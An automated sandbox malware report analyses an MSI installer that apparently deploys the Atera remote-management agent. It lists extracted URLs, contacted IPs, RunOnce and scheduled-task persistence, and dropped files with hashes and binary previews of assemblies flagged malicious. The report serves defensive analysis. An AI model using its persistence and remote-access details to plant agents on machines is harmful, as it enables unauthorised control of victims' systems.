AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2103371672.000001CC12D40000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165983D9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.000001326286F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://chocolatey.org/compare2GAgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://community.chocolatey.org/api/v2/AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://community.chocolatey.org/packages).AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                  https://docs.chocolatey.org/en-us/create/functions/get-toolslocationAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                    https://community.chocolatey.org/api/v2AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                      https://ps.ateHxAteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGERUNTIMEINSTALLER/1.6/AGENTPACKAGERUNTIMEINSTALLEAteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          http://my.splashtop.comAgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageOsUpdates/19.9/AgentPackageOsUpdates.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/19.9/AgentPackageOsUpdates.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://agent-api.atera.com/Production/Agent/GetRecurrinAteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://ps.ateHjOAteraAgent.exe, 0000001A.00000002.2152969045.000001A8821DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://api.nuget.org/v3-flatcontainer/eo.webbrowser/24.1.46/eo.webbrowser.24.1.46.nupkgAgentPackageTicketing.exe, 00000033.00000002.2571688057.000002484569A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmpfalse
                                                                                                                                                                      https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_outdated.gifAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                        https://community.chocolatey.org/api/v2/PAgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://docs.chocolatey.org/en-us/create/functions/uninstall-binfileAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                            https://ps.atera.com/agentpackageswin/AgentPackageNetworkDiscovery/15.0/AgentPackageNetworkDiscoveryAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://licensedpackages.chocolatey.org/api/v2/AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://ps.ateHzAteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://westeurope-5.in.applicationinsights.azure.com/;LiveEndpoint=https://westeurope.livediagnostiAgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmpfalse
                                                                                                                                                                                    https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.ziphAteraAgent.exe, 00000010.00000002.1903414217.00000234003F5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://www.w3.orAgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B343000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B30B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B5D9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B4ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://community.chocolatey.org/packages/autohotkey.portableAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                          https://gist.github.com/jvshahid/6fb2f91fa7fb1db23599AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B4181000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageHeartbeat/17.11/AgentPackageHeartbeat.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://somewhere/bob.exeAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                https://community.chocolatey.org/api/v2/8AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://download.splashtop.comAgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://aka.ms/dotnet/app-launch-failed&gui=trueShowingAteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://docs.chocolatey.org/en-us/create/functions/get-osarchitecturewidthAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                        https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3f30da7a-a0ae-4884-90f3-df2ffec271deAteraAgent.exe, 00000010.00000002.1903414217.000002340008B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyzippackageAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                            https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://agent-api.atera.comrundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://www.nuget.org/packages/NLog.Web.AspNetCoreAgentPackageMonitoring.exe, 00000025.00000002.1830156930.0000022AD93F8000.00000002.00000001.01000000.00000025.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                                                                                                                                                                  https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txtAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmp, ChocolateyTabExpansion.ps1.53.drfalse
                                                                                                                                                                                                                    https://docs.chocolatey.org/en-us/create/functions/install-chocolateyshortcutAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                                      http://www.w3.ohAteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://www.jrsoftware.org/ishelp/index.php?topic=setupexitcodesAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                                          https://community.chocolatey.org/api/v2/.AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                                            http://somewhere123zzaafasd.invalidAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                                              http://schemas.xmlsoap.org/wsdl/AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                http://api.nuget.orgAgentPackageTicketing.exe, 00000033.00000002.2571688057.00000248459E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://nlog-project.org/ws/AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                                                                                                                                                                                    http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesTAgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                                                                                                                                                                                      https://ps.atera.com/aAteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        40.119.152.241
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                                                                                                        93.184.221.240
                                                                                                                                                                                                                                        		unknownEuropean Union
                                                                                                                                                                                                                                        		15133EDGECASTUSfalse
                                                                                                                                                                                                                                        13.35.58.89
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                        35.157.63.229
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                        13.107.253.72
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        20.101.57.9
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        13.35.58.104
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                        35.71.184.3
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		237MERIT-AS-14USfalse
                                                                                                                                                                                                                                        192.229.221.95
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15133EDGECASTUSfalse
                                                                                                                                                                                                                                        20.60.197.1
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1524137
                                                                                                                                                                                                                                        Start date and time:2024-10-02 15:56:46 +02:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 14m 32s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:64
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Sample name:TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winMSI@109/899@0/10
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 15.4%
                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 67%
                                                                                                                                                                                                                                        • Number of executed functions: 399
                                                                                                                                                                                                                                        • Number of non-executed functions: 2
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .msi

                                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7880 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7892 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 8112 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageSTRemote.exe, PID 3916 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AteraAgent.exe, PID 1504 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AteraAgent.exe, PID 7016 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AteraAgent.exe, PID 8144 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 7508 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 7700 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 7808 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 7884 because it is empty
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                                                        • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                                        • VT rate limit hit for: TRABALHO----PROCESSO0014S55-S440000000S1.msi

                                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                        09:57:52API Interceptor2x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                                                                        09:57:58API Interceptor1266x Sleep call for process: AteraAgent.exe modified
                                                                                                                                                                                                                                        11:19:45API Interceptor35x Sleep call for process: AgentPackageAgentInformation.exe modified
                                                                                                                                                                                                                                        11:19:53API Interceptor385x Sleep call for process: AgentPackageSTRemote.exe modified
                                                                                                                                                                                                                                        11:20:06API Interceptor40x Sleep call for process: AgentPackageMonitoring.exe modified
                                                                                                                                                                                                                                        11:20:31API Interceptor26x Sleep call for process: AgentPackageMarketplace.exe modified
                                                                                                                                                                                                                                        11:20:32API Interceptor311x Sleep call for process: AgentPackageTicketing.exe modified
                                                                                                                                                                                                                                        11:20:32API Interceptor1x Sleep call for process: AgentPackageInternalPoller.exe modified
                                                                                                                                                                                                                                        11:20:37API Interceptor17x Sleep call for process: AgentPackageProgramManagement.exe modified
                                                                                                                                                                                                                                        11:20:53API Interceptor7x Sleep call for process: AgentPackageUpgradeAgent.exe modified
                                                                                                                                                                                                                                        17:20:23Task SchedulerRun new task: Monitoring Recovery path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe s>schedulerrun
                                                                                                                                                                                                                                        17:21:01AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {ff783edd-4e4e-491d-9d9c-72f3aa70cedf} "C:\ProgramData\Package Cache\{ff783edd-4e4e-491d-9d9c-72f3aa70cedf}\dotnet-runtime-6.0.32-win-x64.exe" /burn.runonce
                                                                                                                                                                                                                                        17:21:28Task SchedulerRun new task: AteraAgentServiceWatchdog path: C:\Program Files\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe s>eyJBZ2VudElkIjoiMzc1N2M3NjEtOWU1MC00ZjE1LTgwODYtMGU1ODRkY2VlYTQ4IiwiQ29tbWFuZElkIjoiNGViOGIzYWUtM2ExZS00YzdiLWE3ZjMtODg0ZGIyNzIxODk4IiwiQWNjb3VudElkIjoiMDAxUTMwMDAwME1IR0E5SUFQIiwiQWdlbnRBcGlIb3N0IjoiYWdlbnQtYXBpLmF0ZXJhLmNvbS9Qcm9kdWN0aW9uIiwiQXJndW1lbnRzIjoie1x1MDAyMkNvbW1hbmROYW1lXHUwMDIyOlx1MDAyMmhlYWx0aGNoZWNrXHUwMDIyfSIsIkFnZW50RGlyZWN0b3J5IjoiIn0=

                                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        4c9995.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                        4c9996.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                        4c9997.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        4c9998.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
